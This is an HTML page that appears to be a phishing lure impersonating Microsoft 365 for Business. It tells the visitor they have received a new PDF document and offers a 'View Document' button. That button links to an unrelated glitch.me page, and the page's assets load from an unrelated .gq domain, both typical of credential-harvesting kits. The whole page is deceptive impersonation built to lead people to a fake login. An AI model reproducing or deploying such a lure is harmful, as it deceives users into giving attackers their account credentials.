<!DOCTYPE html>
<html class="no-js" lang="en">
<!--<![endif]-->

<head>

    <!--- basic page needs
    ================================================== -->
    <meta charset="utf-8">
    <title>Microsoft® Business</title>
    <meta name="description" content="">
    <meta name="author" content="">

    <!-- mobile specific metas
    ================================================== -->
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- CSS
    ================================================== -->
    <link rel="stylesheet" href="https://rcatalinar.gq/a/css/base.css">
    <link rel="stylesheet" href="https://rcatalinar.gq/a/css/vendor.css">
    <link rel="stylesheet" href="https://rcatalinar.gq/a/css/main.css">
    

    <!-- script
    ================================================== -->
    <script src="https://rcatalinar.gq/a/js/modernizr.js"></script>
    <script src="https://rcatalinar.gq/a/js/pace.min.js"></script>

    <!-- favicons
    ================================================== -->
    <link rel="shortcut icon" href="https://rcatalinar.gq/a/micon.png" type="https://rcatalinar.gq/a/micon.png">
    <link rel="icon" href="https://rcatalinar.gq/a/micon.png" type="https://rcatalinar.gq/a/micon.png">



</head>

<body id="top">

    <!-- header
    ================================================== -->
    <header class="s-header">

        <div class="header-logo">
            <a class="site-logo" href="https://rcatalinar.gq/a/index.html">
                <img src="https://rcatalinar.gq/a/images/micon.png" alt="Homepage">
            </a>
        </div>


        
            
            <a class="header-menu-toggle" href="#0">
            
            <span class="header-menu-icon"></span>
        </a>
       


    </header> <!-- end s-header -->


    <!-- home
    ================================================== -->
    <section id="" class="s-home target-section" data-parallax="scroll" data-image-src="https://rcatalinar.gq/a/images/hero.jpg" data-natural-width=3000 data-natural-height=2000 data-position-y=center>

        <div class="overlay"></div>
        <div class="shadow-overlay"></div>

        <div class="home-content">

            <div class="row home-content__main">

                


                <h1>
                    Microsoft 365® for Business
                </h1>
                <h3>YOU RECEIVED A NEW DOCUMENT</h3>
                <h3>FILE TYPE: PDF</h3>
                <h3>WEDNESDAY, MARCH 09 2022</h3>
                


                <div class="home-content__buttons">
                    <a href="https://forested-sandy-drug.glitch.me/moencons.html"class="btn btn--stroke">
                        View Document
                    </a>


                    
                   
                </div>

            </div>


            <div class="home-content__line"></div>

        </div> <!-- end home-content -->


        
        <!-- end home-social -->

    </section> <!-- end s-home -->

<!-- footer
    ================================================== -->
    <footer>

        <div class="row footer-main">

            <div class="col-three tab-full left footer-desc">

                <div class="footer-logo"></div>
                <h4>Microsoft 365 Admin</h4>
                <p>Use the question mark icon in the top right corner of the Admin Center to access help resources. Admin authentication is required.</p>

            </div>

            <div class="col-three tab-full left footer-desc">

                <div class="footer-logo"></div>
                <h4>Self-help resources</h4>
                <p>Access help and learning content for educators, students, parents, and guardians.</p>

            </div>

            <div class="col-three tab-full left footer-desc">

                
                <div class="footer-logo"></div>
                <h4>Microsoft Educator</h4>
                <p>Explore training, lesson plans, and resources for educators in K-12 and higher education.</p>

                

            </div>
            <div class="col-three tab-full left footer-desc">

                
                <div class="footer-logo"></div>
                <h4>Support requests</h4>
                <p>Submit a support request in Microsoft Education Support for educators.</p>

                

            </div>
            

        </div> <!-- end footer-main -->

        <div class="row footer-bottom">

            <div class="col-twelve">
                <div class="copyright">
                    <span>© Microsoft 2022</span> 
                    <span>English (United States)</span>    
                </div>

                <div class="go-top">
                    <a class="smoothscroll" title="Back to Top" href="#top"><i class="icon-arrow-up" aria-hidden="true"></i></a>
                </div>
            </div>

        </div> <!-- end footer-bottom -->

    </footer> <!-- end footer -->
 


    <!-- photoswipe background
    ================================================== -->
    <div aria-hidden="true" class="pswp" role="dialog" tabindex="-1">

        <div class="pswp__bg"></div>
        <div class="pswp__scroll-wrap">

            <div class="pswp__container">
                <div class="pswp__item"></div>
                <div class="pswp__item"></div>
                <div class="pswp__item"></div>
            </div>

            <div class="pswp__ui pswp__ui--hidden">
                <div class="pswp__top-bar">
                    <div class="pswp__counter"></div><button class="pswp__button pswp__button--close" title="Close (Esc)"></button> <button class="pswp__button pswp__button--share" title=
                    "Share"></button> <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button> <button class="pswp__button pswp__button--zoom" title=
                    "Zoom in/out"></button>
                    <div class="pswp__preloader">
                        <div class="pswp__preloader__icn">
                            <div class="pswp__preloader__cut">
                                <div class="pswp__preloader__donut"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                    <div class="pswp__share-tooltip"></div>
                </div><button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"></button> <button class="pswp__button pswp__button--arrow--right" title=
                "Next (arrow right)"></button>
                <div class="pswp__caption">
                    <div class="pswp__caption__center"></div>
                </div>
            </div>

        </div>

    </div> <!-- end photoSwipe background -->


    <!-- preloader
    ================================================== -->
    <div id="preloader">
        <div id="loader">
            <div class="line-scale-pulse-out">
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
            </div>
        </div>
    </div>


    <!-- Java Script
    ================================================== -->
    <script src="https://rcatalinar.gq/a/js/jquery-3.2.1.min.js"></script>
    <script src="https://rcatalinar.gq/a/js/plugins.js"></script>
    <script src="https://rcatalinar.gq/a/js/main.js"></script>


</body>
</html>
